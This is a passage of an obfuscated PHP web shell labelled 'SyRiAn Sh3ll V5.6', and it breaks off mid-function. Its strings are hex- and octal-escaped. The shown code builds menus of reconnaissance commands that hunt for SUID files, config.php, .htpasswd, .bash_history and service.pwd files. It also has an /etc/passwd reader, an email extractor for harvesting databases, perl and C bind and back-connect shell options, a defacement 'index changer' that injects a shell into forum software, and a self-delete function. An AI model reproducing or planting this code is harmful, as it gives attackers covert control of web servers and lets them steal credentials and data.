        <option value='d\151r /s /w /b *config*.\160\x68p'>\x46\x69\156\x64 *config*.\160\x68\x70 in c\165\162\162\x65\156\x74 \x64\151\x72 &\x6e\x62sp; &\156b\x73\160; &\156\x62s\x70; &\156\x62\x73\x70; &\156\x62\x73\x70; &\156\x62s\x70; &\156b\x73p; &n\x62s\x70; &n\142\x73p; &\156\142s\160;  &\156\x62sp;  &\x6e\142\x73p;  &\x6e\142\163\160;  &\x6e\142\163p;  &\156b\163p;</option>
        <option value='\156et\163\164a\164 -\x61\156'>\123h\157w a\x63\164iv\145 conne\x63\x74\151ons</option>
        <option value='\x6e\x65t start'>Sh\x6fw ru\x6en\x69\x6e\147 se\x72\x76\151c\145s</option>
        <option value='\x74\141\x73kl\151s\164'>\x53\x68\x6f\x77 \x50\x72\157</option>
        <option value='n\145\x74 user'>\125\163\145r \x61\x63co\x75\x6e\164\163</option>
        <option value='\x6ee\164 v\x69\145\167'>\123\x68\157\167 \143\x6f\x6d\160\x75\x74er\163</option>
        <option value='\141\x72\x70 -a'>AR\120 Ta\142\154e</option>
        <option value='ip\x63\x6f\x6e\146\x69g /\x61ll'>\111P \x43\x6f\x6e\146\151\147\x75r\x61\x74\x69\x6f\x6e</option>
        <option value='n\145\164\x73t\x61t -\x61\156'>n\x65\x74\x73t\x61t -\141\156</option>
        <option value='sys\x74em\x69nfo'>S\171st\x65\155 \111\x6ef\157\x72\x6da\164io\156\x73</option>
        <option value='\147e\x74ma\x63'>\107\x65\x74 \115a\143 Address</option>
        </\x73e\x6c\145\x63\164>
        "; } else { echo "
        <s\145\154\145c\164 name=alias >
        <option value=''>\x4e\x4f\x4e\x45</option>    
        <option value='\154s -\154\x61'>\114i\163\164 \144\151\162</option>
        <option value='\x63\x61t /\145t\143/\x68\x6fs\x74s'>\111\x50 A\x64dr\x65ss\145s</option>
        <option value='\x63\141t /\x70r\x6fc/\x73\x79s/\166\x6d/\x6d\x6dap_\x6din_\141dd\x72'>Che\143k \115MAP</option>
        <option value='\x6c\x73attr -v\x61'>\154\151\x73\x74 f\x69l\145 a\x74\164\x72\151\142\165t\145\163 o\x6e a Linu\170 s\145\143o\156\144 \x65\x78t\145\x6e\144e\144 \146\151\x6ce s\x79\x73\x74\145m</option>
        <option value='\x6ee\x74\x73t\141\164 -a\156 | \x67\x72\145\160 -i \x6c\x69\x73t\x65\156'>\163ho\167 \157\160\145n\x65\144 \160\157\162\x74\163</option>
        <option value='\x66\151nd / -type \146 -\x70erm -04000 -l\163'>\x66\x69\x6e\144 \141ll \x73\165\x69\144 f\x69\x6c\x65s</option>
        <option value='\146i\156\x64 . -type \x66 -\160\x65rm -04000 -l\163'>\x66\151nd sui\144 \146\x69\x6c\145\x73 i\x6e \143ur\x72\x65\x6et d\x69\162</option>
        <option value='f\x69n\144 / -type \x66 -\x70\145\162\155 -02000 -ls'>\x66\x69\156\144 \x61\x6cl \x73g\151d f\x69\154\145\x73</option>
        <option value='\x66i\x6e\x64 . -type \146 -\x70e\x72\x6d -02000 -\154\163'>\146\151\x6ed s\147\x69\x64 \146\151\154\145s i\x6e \x63ur\162en\164 dir</option>
        <option value='fi\x6e\x64 / -type \146 -name config.\151n\x63.\160\150\x70'>fi\156d config.\x69nc.\160\x68\x70 \x66i\154\145\163</option>
        <option value='\x66\x69\156\x64 / -type \x66 -name \"config*\"'>\146\x69n\144 config* \x66\x69\154\145s</option>
        <option value='\146\x69\156\144 . -type \x66 -name \"config*\"'>\x66ind config* \x66\151l\145s i\156 \143ur\162\x65n\164 \144\x69\162</option>
        <option value='f\151\x6e\x64 / -p\x65rm -2 -\154\x73'>\146i\156\x64 al\154 \167\x72\151t\141\142\154\x65 \146\157\x6c\144\x65r\163 \141\156\x64 \x66i\154\145\x73</option>
        <option value='f\151\x6e\x64 . -\160\x65\162\155 -2 -\x6c\163'>fi\156\x64 a\154l \x77\x72ita\x62l\145 \146\157\154\144ers a\156\x64 \146\151\154\x65\x73 \x69\x6e \x63\x75\162\162e\156\x74 dir</option>
        <option value='f\151\x6e\x64 / -type f -name \163\145\162v\151\143e.\160\167d'>\146in\144 a\x6cl \163e\x72\x76\x69\x63\x65.\160w\x64 \146\151\x6ces</option>
        <option value='\146\151n\144 . -type \146 -name \163\x65\162\166i\x63\x65.pw\x64'>\146i\156d \163\145\162\x76\151ce.\160w\x64 \146\151\x6ce\x73 \x69\x6e \x63\165r\162\145n\x74 di\162</option>
        <option value='\x66\x69\156d / -type \146 -name .\x68\164pa\163s\x77d'>\x66\151n\144 \x61l\154 .\x68tp\141\x73sw\144 \146\151l\x65s</option>
        <option value='\x66\x69\156d . -type \x66 -name .h\164\160\141\163s\167d'>\x66\x69\x6e\144 .\150\164p\141\163\163\x77\x64 fi\154\x65s in \143\x75\x72\x72e\156\x74 \144\151\x72</option>
        <option value='\146i\156\144 / -type \x66 -name .b\x61s\150_\x68\151s\x74\157\162\x79'>\x66i\156\x64 \141l\154 .b\x61\163\150_\150\x69s\x74\x6f\x72y f\151\x6ces</option>
        <option value='\x66\151\x6e\x64 . -type f -name .\x62\141\x73\x68_\150\151sto\x72\x79'>\146\151n\144 .b\x61\163\150_h\x69\x73\x74\157\162y \146\x69\154e\163 \x69\x6e c\165rr\x65n\x74 \144i\x72</option>
        <option value='f\151\156d / -type f -name .\146\145\x74chma\151l\162\x63'>\146\x69\156d a\x6cl .\146\145t\143\x68\x6da\x69\154r\143 fil\x65\163</option>
        <option value='\146\151\156\144 . -type \x66 -name .\146\x65\x74\143\150ma\x69l\x72\143'>\146in\144 .\x66\x65\x74\x63\x68m\141\x69\154\162\x63 \x66ile\163 \x69n c\x75\x72r\145\x6e\x74 d\x69\x72</option>
        <option value='\x6co\x63a\164e \150t\164\x70\x64.con\146'>\154\157\x63\141te \x68\164\164p\144.\x63o\x6ef \146\151\154\145\163</option>
        <option value='\x6c\157c\141t\145 \x76\150os\x74\x73.c\x6f\156\x66'>l\x6f\143\x61\x74e \166h\157s\x74\x73.c\x6fn\146 \146\x69\154\145s</option>
        <option value='\x6c\x6fc\x61\x74\x65 \x70\x72\x6ff\x74\160\x64.\x63\157\156f'>\x6c\x6f\x63\x61\164\145 \x70\162\157\x66t\160\144.\x63o\x6ef fi\x6ce\163</option>
        <option value='\x6co\143\x61\164\x65 psy\x62nc.\143o\156f'>\154\x6f\143\141\164e \160\x73\x79\142\156c.\143\x6f\x6e\x66 fi\154\145\163</option>
        <option value='\x6c\x6f\143\141\x74\145 \155\x79.co\156\146'>\x6c\157\x63a\x74\145 \155\171.\x63\157\x6e\146 \146\151\x6c\145s</option>
        <option value='\154o\143\141\164\145 admin.\160h\160'>\x6c\157\143\x61\164\145 admin.\x70hp f\x69le\163</option>
        <option value='\x6c\157\x63at\x65 \143\x66g.p\150\160'>\x6co\143\x61\x74\145 \x63\x66\147.p\x68\x70 \x66\151\154\x65\x73</option>
        <option value='\x6c\x6fc\x61t\x65 \x63\x6fn\146.\160\x68p'>l\157\x63\x61\x74\x65 \143\157\x6ef.\160hp f\151l\145\x73</option>
        <option value='\x6c\x6f\143a\164\x65 config.dat'>\x6c\x6fca\164e config.dat f\151\154es</option>
        <option value='loc\x61t\145 config.\x70\x68\x70'>\154\x6f\143a\164e config.\x70\150\x70 \x66\151\x6c\x65\163</option>
        <option value='\x6co\143a\164e config.i\156\x63'>l\157\x63\141\164e config.\151n\x63 fil\145\163</option>
        <option value='l\x6f\x63\x61\164\145 config.inc.\160h\160'>\154\x6f\x63\x61\x74\x65 config.i\x6e\x63.p\150p</option>
        <option value='\154o\x63a\164e config.\144\145\x66aul\x74.\x70\x68\x70'>\x6c\157\143\141\x74e config.\x64\145\146a\x75lt.php f\151les</option>
        <option value='lo\x63\x61\x74\x65 config'>\154oc\x61te config* \x66\x69\154e\x73 </option>
        <option value='\154\157\x63a\164\x65 \'.\x63\157nf\''>\x6coca\x74\x65 .\143\157nf f\x69l\x65\x73</option>
        <option value='\x6c\157\x63\141\164\x65 \'.\160wd\''>\x6c\157\143\141\164e .p\167d \x66i\x6c\x65\x73</option>
        <option value='l\x6f\x63\x61\164\145 \'.sql\''>l\x6fc\141t\x65 .sql \x66\x69l\x65\x73</option>
        <option value='\x6c\x6f\143\x61\x74e \'.\150t\160\x61\x73\163\167d\''>\x6c\157\143at\145 .\x68\164p\x61\163\x73\167d \146i\x6ce\163</option>
        <option value='lo\143\141\x74\145 \'.b\x61\x73h_\150\x69\x73\x74\157\162\171\''>\154o\143\x61\x74\x65 .\142a\x73h_his\164\157\x72y \x66\151\x6ces</option>
        <option value='lo\143\x61\164e \'.\155y\x73ql_\x68\x69\x73t\157\x72\171\''>\154o\143\141te .\155y\x73q\154_h\151s\164or\x79 f\151\x6c\x65s</option>
        <option value='locat\145 \'.f\145\x74\x63hm\141i\x6c\x72\143\''>l\157ca\x74\x65 .\146\x65t\143\x68\x6d\141\x69\x6c\162c fi\x6c\x65\x73</option>
        <option value='\x6c\157cat\145 \142\x61\143k\x75p'>lo\x63\141t\x65 bac\x6b\165\x70 \146\x69les</option>
        <option value='\x6c\x6fca\164\x65 \x64\x75mp'>\154\x6fca\x74\145 du\155\x70 \146\151\x6c\x65\x73</option>
        <option value='\154o\143\141te \160\x72\x69v'>\x6c\157\x63\141\x74\145 p\x72i\166 \146\151\x6c\x65\163</option>
        </\163\145l\145\x63\x74>
        "; } } function iii0li0iIOii1III($name,$content) { $file = fopen($name,"w+"); if($file) { $iII1lOolO0o1oIi0 = fwrite($file,$content); if(!$iII1lOolO0o1oIi0){return false;} } else{return false;} fclose($file); return true; } function which($ioi1i110o00OIoio) { $path = Exe("which $ioi1i110o00OIoio"); if(!empty($path)) { return trim($path); } else {return trim($ioi1i110o00OIoio);} } function i11Ii10o0oIli1I1($ili1i1l011oIIIIl) { global $disablefunctions,$safemode; $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open'); if($safemode=='ON' && in_array($ili1i1l011oIIIIl,$safe))return 0; elseif(function_exists($ili1i1l011oIIIIl) && is_callable($ili1i1l011oIIIIl) && !strstr($disablefunctions,$ili1i1l011oIIIIl))return 1; return 0; } function CSS($iIi1i11l11OoIlIl) { $css = "
    <h\164\x6d\154 \x64\x69r=r\164\x6c>
    <h\145a\144>
    <\164\x69\164le>S\x79\122\x69\101\x6e Sh\x33\154\154 ~ \x56\065.6~ [ B\x33 \x43r3\064\x54!V\063 \x4fr \104!3 T\x52\171!\156G ]</title>
    <\154\151n\153 \x72e\154=\"s\150or\x74\143u\164 \151c\x6f\x6e\" \x68\x72\145\x66='h\164\164p://\x73y\x72\x69a\156-shell.\x63\x6f\155/\164i\x74\154e.\147i\146' />
    <m\145t\141 \x68t\164\160-\145q\165i\x76=\x43\157nt\145\x6et-\124y\160\x65 content=text/htm\x6c; c\150\141\x72\163\x65\x74=wi\156\x64\157\167s-1256>
    <s\x74\x79\x6ce>
    B\117\x44\x59
    {
        \106\117N\124-\106A\115\x49L\x59: \x56e\x72da\x6e\x61; 
        m\141rgin: 2;
        \143ol\x6fr: #c\143\x63\143\143\143;
        \142\x61\143\153\x67\x72\157\x75n\144-\x63\x6f\x6c\157\x72: #000000;
    }
    sy  
    {
        \143o\154\157\162:".$iIi1i11l11OoIlIl.";
        \x66on\x74-size:7\160t;
        \x66on\x74-w\145\x69\147h\164: \142o\154\144;
    }
    #Box
    {
    \143\x6f\154\157r:".$iIi1i11l11OoIlIl.";
    \146on\164-size:14\x70\x78;
    \142\x61\143k\x67\x72\157\165\x6e\144-\x63olor:#000;
    \x66\157\156t-\x77e\151\x67\x68\164:\x62ol\x64;
    }
    \164\162 
    {
    B\117\x52\104\105\122-\x52\x49\x47\110\x54:  #cc\x63c\143c 1\160\170 \x73o\x6c\151\144;
    B\x4f\x52\x44\x45\x52-\124\x4f\120:    #\x63\143\143\x63\143\x63 1\x70\x78 \163\x6fl\x69\144;
    \102O\x52\x44ER-\x4cE\106\x54:   #\143\143ccc\143 1px \163\x6f\x6c\151\x64;
    B\117RD\x45\x52-\102\117T\x54\117\115: #\x63\x63\143\x63\x63\143 1\160\170 \x73\x6f\x6c\x69\x64;
    c\157l\x6f\162: #\146\146\146\146\146f;
    }
    \x74\144 
    {
    B\117\x52\104\105R-\x52\111\107H\124:  #\143c\143\x63\143\x63 1\x70\170 s\x6f\x6c\151\144;
    B\117R\104\x45R-\x54\x4f\120:    #\143c\x63\143\143\143 1p\x78 \x73o\154\151d;
    \102\117\122\x44\105R-L\x45\x46\124:   #\x63\143\x63\143\x63\143 1\160x \163\157\x6c\151d;
    B\x4fR\x44\x45R-\x42\117\x54\x54\117\x4d: #\143\143\x63c\143\143 1px \163\157\154id;
    \143\x6fl\x6f\x72: #\x63\143\x63\143\x63\x63;
    }
    .\x74\x61\x62l\145\061 
    {
    \x42\117\x52\x44\x45\x52: 1\x70\170 n\157ne;
    \x42A\x43\113\107RO\125\116\x44-C\117\x4c\117\x52: #000000;
    c\x6fl\157\x72: #333333
    }
    .\x74d1 
    {
    B\x4f\122\x44E\x52: 1\160\x78 \156o\156e;
    co\x6c\x6f\162: #\x66\146\x66\x66\146\146; f\x6f\156\x74-\163\x74\x79\154\x65:\156o\x72\155a\154; 
    font-v\141r\x69\x61nt:\156o\162\x6dal;
    f\x6f\x6e\x74-w\145i\147\x68t:\x6e\157\162m\141\154;
    f\x6f\x6e\x74-size:7\160\164;
    \146\157nt-\146am\x69\x6c\x79:\164ah\x6fma
    }
    .\x74\162\x31 
    {
    \102O\122\x44E\122: 1p\170 \156on\x65;
    co\x6c\x6f\x72: #\143\143\143\143\x63\143;
    }
    ta\x62le 
    {
    \102\117R\x44ER:  #e\x65e\145\145\145  out\163e\x74;
    BA\x43K\x47\x52\117\x55\x4e\104-CO\114\x4fR: #000000;
    \x63\x6f\154\157r: #\x63\143\x63ccc;
    }
    input 
    {
    B\117\122D\x45\x52-R\111\107\x48T:  ".$iIi1i11l11OoIlIl." 1\x70\170 \x73\x6f\154\151d;
    B\117\x52\104ER-\x54\117P:    ".$iIi1i11l11OoIlIl." 1\160\x78 s\157\154i\x64;
    \x42\x4f\122\104\105\x52-\x4c\105FT:   ".$iIi1i11l11OoIlIl." 1\160\x78 \x73\157\x6ci\x64;
    \102\x4fRD\105\122-\102\x4f\124T\x4f\x4d: ".$iIi1i11l11OoIlIl." 1p\x78 \x73\x6f\x6c\151\x64;
    BA\x43K\x47\122OU\x4eD-C\117\x4cO\x52: #333333;
    \146ont: 9p\x74 \164\x61\x68\157m\141;
    \143o\154o\162: #\x66f\146f\146f;
    }
    s\145l\145\143\164 
    {
    BO\x52\x44\x45\122-R\111\x47HT:  #\146\x66\146\146\146f 1\160x \163\x6f\154\x69\x64;
    \102\x4f\x52DE\122-TOP:    #999999 1\160x \x73oli\x64;
    \x42OR\104E\122-\114EFT:   #999999 1px s\157l\x69d;
    B\x4fR\104\x45\x52-\x42\117\x54\124\x4fM: #\x66\146\x66f\x66f 1\x70\170 \x73\157\154\x69d;
    \102\101C\x4bGR\117UN\x44-\103\x4f\x4c\117R: #000000;
    \x66\x6fn\164: 9\x70t \164\141h\x6f\155a;
    \x63\x6f\x6c\x6f\x72: #\x43\x43C\x43\x43\x43;;
    }
    submit 
    {
    \102O\x52\104\105\x52:  1p\x78 o\165t\163\145t \x62u\x74\x74\157\156hig\150\x6c\151\147\x68\x74;
    BAC\113\x47\x52OU\116\104-\103O\x4cOR: #272727;
    \167\x69\144t\x68: 40%;
    col\x6f\x72: #\143c\x63\143\x63\x63;
    }
    tex\x74a\x72\145a 
    {
    \x42\x4fR\x44ER-R\x49\x47H\124:  #\x66\146\146fff 1\160\170 \163\157\154\x69\144;
    \x42O\122\x44\x45\122-\x54\x4f\x50:    #999999 1\160x \x73o\x6c\151d;
    \x42\x4f\122\x44\x45\122-L\105\x46\x54:   #999999 1\160\170 sol\x69\x64;
    \x42\117\x52\x44\105\122-\x42\117\124\x54OM: #f\146\x66f\146f 1\160x \x73ol\x69\x64;
    \102\101\x43\x4bGROUN\x44-\x43\x4f\x4c\117\x52: #333333;
    co\x6c\157\x72: #\146\146\146\146\146\146;
    }
    \x41:\x6ci\x6e\x6b {CO\x4c\x4fR:".$iIi1i11l11OoIlIl."; \124E\130\x54-\x44EC\117\x52A\124\111\x4f\x4e: no\x6ee}
    \x41:\x76i\163\x69\164\145\x64 { \x43\x4f\114\x4f\x52:".$iIi1i11l11OoIlIl."; \124\105\130\124-\x44\105CORAT\x49\117\x4e: n\157\156e}
    \x41:\141\143\164\151\166\x65 {C\117\114\117\122:".$iIi1i11l11OoIlIl."; TEX\124-DE\103O\x52\101\x54I\117\x4e: \156\x6fne}
    \x41:\150\157v\x65r {\x63\x6f\154o\x72:b\x6cue;\x54\x45XT-D\105\x43\117\x52\101T\111\x4f\116: \x6e\x6f\x6e\x65}
    </s\164\x79l\145>
    <s\x63\162i\x70t>
fu\x6e\143\x74ion \x69n\x73(text)
{
    \x64o\x63u\155\x65\156\x74.\x6es\x74.chars.value+=text;
    \x64o\143ument.\156st.chars.fo\143u\x73();
}
\x66\165nct\151\157\x6e Suicide()
{
    \166\x61\x72 co\x6ef\x69\x72m\x53u\x69\x63i\144\x65 = \143\x6f\156\x66\151rm('\101r\x65 Y\157\x75 \x53ur\x65 \x59\x6f\x75 \x57\x61\156\x6ea D\145l\x65\x74\145 \164\x68\145 \x73\1503\154\x6c ?');
    i\146(\x63\x6f\156\x66i\x72\x6d\123\165\151c\151\x64\145 == \164\x72\165\145){\144o\143u\155e\x6et.l\157\x63\x61t\x69o\x6e='".i01oiOo00oiIl1Io()."?\151d=\104e\x6ce\x74e';}
    \145l\x73e{\144o\143\x75men\164.\x6c\157ca\164i\157n='".i01oiOo00oiIl1Io()."';}
}
fu\156\143\x74\151o\156 \x42l\165\x72(\151\144 , \x64ef\141\154u\x74\x54\145\x78t)
{
    \151f( \x64\x6f\x63\165m\x65\x6et.get\105\154\x65\x6d\145\156\x74B\x79I\144(\x69\x64).value == ''){\144\x6f\143\165ment.\x67e\x74\105l\145m\x65\156\x74\102\x79\x49\144(\x69\x64).value = d\x65f\x61\154\x75\164Tex\164;}
}
\146\x75\156\143t\151o\x6e Cle\x61\162(i\144 , \x64\145\x66\x61\154u\164\x54e\170\x74)
{\151\x66( \144o\143\x75\155ent.\147e\x74\105l\145\155\145n\164\102\x79\x49d(\x69\x64).value == \x64\145falutT\x65x\x74){\144\157\143\x75\x6d\145\x6et.\147\145\x74Elem\145\156\x74By\x49\144(\x69\144).value = '';}}    
\146\165n\x63\x74i\157\156 \x53\x63\x72\x69p\x74s\124\x79p\x65()
{
    \151f(\144o\143\x75m\x65n\164.\x67\145tE\x6cem\x65\x6e\164\x42\x79\111\144('ScriptType').value == 'v\142')
    {\144\157\x63\165m\x65\x6e\x74.g\145\164\x45\x6c\145\155\145n\x74\x42yI\x64('\x50\162e\146\151\170').value = '';}
    e\154\x73\145 if(d\x6fc\165\x6d\x65n\164.\147\145\164\105\154em\x65\156t\x42yI\x64('ScriptType').value == '\x77p')
    {\144\157c\x75me\156\x74.\147\145t\105l\x65\x6d\145\156\164\102y\x49d('P\162e\x66\151x').value = '\167\160_';}
    \x65l\163\x65 i\x66(\144o\143um\x65\x6et.\147\145\x74\105l\x65\x6d\145n\164\x42yI\x64('ScriptType').value == '\152\157s')
    {\x64oc\165\155\145nt.g\x65\164\x45\x6c\145\155en\164\102\171\111d('\x50ref\151x').value = '\152o\x73_';}
    \145\154\x73e \x69\x66(\144\x6f\x63\165\155\145n\164.\147et\105\154\145\155\145n\x74\102\171\x49\x64('ScriptType').value == '\x70\150\x70\x62\x62')
    {d\157\x63um\145\x6e\164.\x67e\x74E\x6ce\155\145nt\102y\111\144('\x50\x72e\146\x69x').value = '\160\150\x70\142\x62_';}
    \145\154\x73e i\146(\144\x6f\143u\x6d\x65\x6et.\147e\164E\x6ce\x6d\x65nt\102yId('ScriptType').value == 'ipb')
    {do\x63\165\155e\x6e\164.getEle\x6de\156\x74\102y\111d('\x50r\x65\146i\170').value = 'ip\142_';}
    \145\154s\145 i\146(do\143um\x65\x6e\x74.g\145t\105\154\145\x6d\145\156\x74B\x79\111d('ScriptType').value == 'm\x79b\x62')
    {\x64\x6f\x63\x75m\145n\164.g\145\x74\105l\145m\145\156\x74\102\x79\111\144('\120\x72\145\146\151\x78').value = '\155\171bb_';}
    e\154\x73\145 \x69\146(d\x6fc\x75\x6de\x6et.\x67\145\x74\x45\154em\145\156tBy\111\144('ScriptType').value == 'sm\146')
    {\x64\x6fcu\155\x65\156\x74.\x67\x65\x74El\145m\x65ntBy\x49\x64('\120\162e\x66\x69\170').value = '\163\155\x66_';}
}
\146\165n\x63ti\x6f\x6e \x65\166\x61\154O\162E\156\x632()
{
    if(d\x6f\x63\165m\x65\156\x74.\x67\x65\x74\x45l\x65\155e\156\164\102\x79\111\144('\145v\x61l\117\162\x45\x6e\143').value == '\145\x76\x61\x6c')
    
{\144\157c\x75\155\145\x6et.\147\145\164\105l\x65\155\x65\x6e\164\x42\171\x49\x64('\x70\x68p_e\x76\141l').value = '<?ph\x70 \145\x63\x68o \"S\x79R\x69\101\x6e_\123h\063\x6c\x6c V5.6 LEAKED\"; ?>';}
    \x65\154\163e \151\146(\144\x6fc\165\155\x65\156\164.g\x65\x74\105\x6ceme\156t\102\x79\111\x64('e\x76al\x4frE\x6e\143').value == 'enc')
    {\x64\157c\165\155\145n\x74.\147e\164E\x6ce\155\145\x6e\x74\x42\171\111\x64('\160hp_\x65va\x6c').value = '\x6d\x79 St\162ing \x54o \x45\156cr\x79\160\164';}    
    \x65\x6c\x73\145 i\x66(\x64\x6f\x63\165\155e\x6e\x74.\x67\145\x74\x45l\x65\155\145\x6e\164ByI\x64('\x65\x76alO\x72\x45\x6ec').value == '\x61n\141\154\x79z\x65')
    {\144\157cu\155\145\156\164.\x67\145\164\105\154\x65men\x74\x42\171\111\144('p\150\160_\x65v\141l').value = '\143\x34c\141\x342\063\070\1410b\x39\062\x33\x38\x32\x30\144\143\x635\x30\071a6\1467\x35\x384\x39\x62';}
    \x65\154\x73e \x69f(\144\157\143\x75\x6de\156\164.\x67\x65\164\105\x6c\x65m\145n\164\x42\171\111\x64('e\166\141\154Or\x45\x6e\143').value == 'sc\x61\x6e')
    {d\157\x63\x75m\x65\x6e\x74.\x67\x65\x74El\x65m\x65\156t\x42y\x49d('\x70\150p_\145\x76a\x6c').value = '127.0.0.1';}    
    el\163\145 \151\x66(\144o\143\x75\x6d\145\156\x74.g\145\164El\x65\155\x65nt\102y\x49\144('\x65\x76\141\x6c\117\162\x45\156\143').value == '\x67\145\x6eS\145\x72\166')
    {d\157cu\x6dent.\147\145t\x45\154\145m\145\156\x74\102\x79I\144('\x70h\x70_\x65v\x61\154').value = '".addslashes(getcwd())."';}    
    \145l\163e \151\x66(\x64\157\143\165me\156t.\x67\145\x74\x45l\145\x6de\x6e\164\x42\171\111\144('e\x76al\117\x72\105\x6ec').value == '\163q\x6cS\x63\141\x6en\145\x72')
    {\144\157cu\x6de\x6e\164.\x67e\x74\x45\154\145\x6d\145\156\164B\x79I\x64('p\150\160_ev\x61\x6c').value = 'i\156\x75\x72\154:ph\x70?=i\x64+site';}
}
f\165\156\143\164\x69\157\x6e \103h\141\x6e\147\x65\x53\x51\x4c\124\x79\x70\145()
{
    \x69\x66(\x64\157c\x75\155e\156\x74.\x67\145t\105l\145m\145\156\x74\x42y\x49\144('\x53Q\x4c\124y\160\145').value == 'S\x51\x4c\121\165e\x72\x79')
    {\144\157\x63\165\155\x65\x6e\x74.\x67\145\x74\105\154e\155e\156\164\x42\171\111\144('inpu\x74T\171\160e').in\156\145\162\110T\x4dL = '<\x74\x65\170\x74\x61\x72\x65\x61 name=\'\x51\125\'  rows=\'4\' \x63ols=\'44\'>\x53\105\114EC\x54 * FROM e\x6d\160 ;</\164\145x\x74\141\162\145\x61>';}
    \x65l\x73\x65 i\146 (\144oc\165\x6d\x65\x6e\x74.\x67\x65tEl\145\x6d\x65\156\164B\171Id('\123QL\124\x79pe').value == '\123\121\114R\145a\x64\x65\x72')
    {\144\157\143u\155\x65\156t.\x67etE\x6c\145m\x65\156\x74\x42\171Id('\151\x6e\160\165\164T\171\x70\145').\x69\156\156\x65\162H\x54\115L = '<input type=\'text\' value=\'/\x65\x74c/passwd\' name=\'\146\x69\154e\' size=\'70\'><\x62\162/>';}    
    \145l\163\x65 \151\146 (docu\x6den\x74.\147\145t\105l\x65\155\145\x6etB\x79\111d('\x53Q\114\124\x79\x70\x65').value == '\105\155\x61\151l\x45\170\164\x72a\143\164or')
    {\x64\157\x63um\145\x6e\164.\x67\145\164El\x65\x6d\x65\156tB\171\111d('\151\156\160\x75tTy\x70\145').\151n\x6e\145\x72\110\124\115\x4c = '<input type =\'text\' name=\'E\115_\124\x41B\114\105\' value=\'\x75\x73\145\x72s T\141\142l\x65\' />  <input type =\'text\' name=\'\x45\x4d_C\x4fLU\115\116\' value=\'\x65m\141\x69\154\163 \103o\154\165mn\' />  <input type=\'submit\' value=\'?\' name=\'\145\155ailEx\164\162\x61c\x74o\x72H\x65\154\x70\'  al\x74=\'\x45ma\151l E\170\x74\x72\x61\143t\157\162 H\x65\x6c\x70\'/><\142\162/>';}
}
\146\165\x6ectio\156 v\x69\x65\167\x50a\163\163()
{
    \151\x66(\x64\x6f\143\165m\145\156\x74.get\105\154e\155\145nt\102\171\111\x64('b\x61c\x6b_se\154ect').value == 'p\145\162\x6c\062')    
    {\144\x6fc\165m\x65n\x74.g\145\x74\105\x6c\x65\x6d\145\156\x74\102\x79\111d('\x76\151e\x77_\x70\x61\163\x73').i\x6e\x6e\x65\162HT\x4d\x4c= '<input type=\'text\' name=\'back_pass\' size=\'30\' value=\'password\'>';}
    \x65\154\x73\145 {d\x6f\x63\165\155\145\156t.\x67\145t\x45\154\x65\155\145\x6e\x74B\171\x49\144('\166\x69\x65\x77_\x70a\x73s').\x69n\x6e\145\x72H\x54\115\x4c= '';}
    
    \x69\x66(\x64\x6f\x63\165me\156\x74.\147\145\x74El\145\155\x65\x6etB\171\x49d('b\x69\156\144_\x73\x65\x6c\x65\x63t').value == '\x70\x65r\154\061-l\x69n\165\170')    
    {\x64\157\x63\x75\x6d\x65\156\164.\147\145\x74E\x6ceme\156\164\x42\x79\111\x64('\x76i\145\167_\142\151n\x64_\160\141\163\x73').i\x6en\145\x72H\124\x4d\x4c= '<input type=\'text\' name=\'\x62\x69n\x64_pa\163s\' size=\'30\' value=\'password\'>';}
    els\x65 {\x64\x6f\x63\165me\x6e\164.\x67\x65\x74\105lem\x65\x6et\102\x79\111\144('v\x69\x65\x77_b\x69n\x64_\x70\141\163\x73').\151n\156erH\124ML= '';}
    if(\144\157\143\x75\x6d\x65\x6et.\147\x65\164\x45\154\145\155e\x6e\164\x42\x79\111\144('\142\x69\x6ed_s\x65\x6c\145c\x74').value == '\143\x31-li\156\165\170')    
    {\x64\x6f\143ume\156\164.\x67\145\x74E\154\x65\x6de\156\x74\102\171I\x64('v\x69e\x77_\142\x69n\144_\160as\163').i\156n\x65rH\124ML= '<input type=\'text\' name=\'\x62i\x6ed_\160a\163\x73\' size=\'30\' value=\'password\'>';}
    \x65l\163\145 {do\143u\155\145\x6e\164.g\x65\164\105l\145\x6de\156\164\102y\111\144('\166\x69\x65\167_\x62i\156\x64_\x70\141ss').\x69\156\x6e\x65\162\x48\x54M\114= '';}

}
fu\x6e\143\x74\151\x6f\156 \x61d\144\x55pl\x6f\x61\144\111\x6e\160u\164()
{do\143\x75m\145\x6e\x74.\x67\x65\x74\x45\x6ceme\x6e\x74B\171\111d('u\160l\x6f\141d\111\156\x70u\x74').i\x6e\x6ee\162H\x54M\x4c += '<input type=\'\146i\154\x65\' name=\'\x75\160\154\x6f\141\x64\x66i\154\x65[]\'>';    }    
\x66\165nc\164ion \x68\141c\153\151\156gT\x79\x70e\x73()
{
    i\x66(\144\157\x63u\x6de\x6et.\x67\x65\x74\105\x6c\145\x6d\x65\x6e\x74By\x49d('hackingType').value == 'i\x6e\144e\170\103\x68\141ng\x65r')
    {   
        \144o\143\165\155\145n\164.\x67\x65\164\105\154\x65\x6de\156t\x42\171\111\x64('\x49\156\x6a\x65\143\x74\x53\150\145\x6c\x6cSpa\156').\x69n\x6eerHTM\114 = '<\x73\171>\x49\x6e\x6a\145\x63\164 \x53\x68\x33\154\x6c ? </sy><\x73\x65\154e\143\x74 name=\'\x69nj\x65\143\x74S\150\x65ll\' i\144=\'\151nj\145\143t\123hel\154\' \157\x6ec\150\x61\x6ege=\'inj\x65\143t\123\150\x65l\x6c\x46u\x6ec\x74\151o\156();\'><option value=\'no\'>\116O</option><option value=\'\x79es\'>\131E\123</option></\163\x65\x6c\x65c\x74><\163\x79> V\102\165\154\x6ce\164\151n On\154\x79 ! </s\x79>';
        \144oc\165m\x65\156t.\147\x65\x74\x45\x6c\145m\x65ntB\x79I\144('\x53\110\x42').inn\145\162\x48\124\115\114 = '<\164\145\x78\x74are\141 name=\'\111NDEX\' rows=\'9\' \151d=\'\x74\150e\x49\x6e\x64\145x\' \143\x6f\154\x73=\'45\' onbl\x75\x72=\'Blu\162(\"\164h\145\x49\156\x64\145x\",\"Pu\164 \x59\x6f\165r Index \110e\x72e !\");\' \x6fn\x63\x6c\x69\143k=\'\103\x6c\145\x61\x72(\"\x74\150eIn\144ex\",\"\120\165\x74 \131\157\165\x72 \111n\144e\170 \110\145\x72\x65 !\");\'  >\x50\x75\x74 \131\x6f\x75\x72 \x49nd\x65\170 H\x65r\x65 !</te\170\x74ar\x65\x61>';
    }
    e\x6c\163\145 \151\x66(\144\157\143\165\x6de\156\164.\x67\145\x74\x45\154\145m\x65\x6e\x74\x42y\x49d('hackingType').value == 'changeInfo')
    {
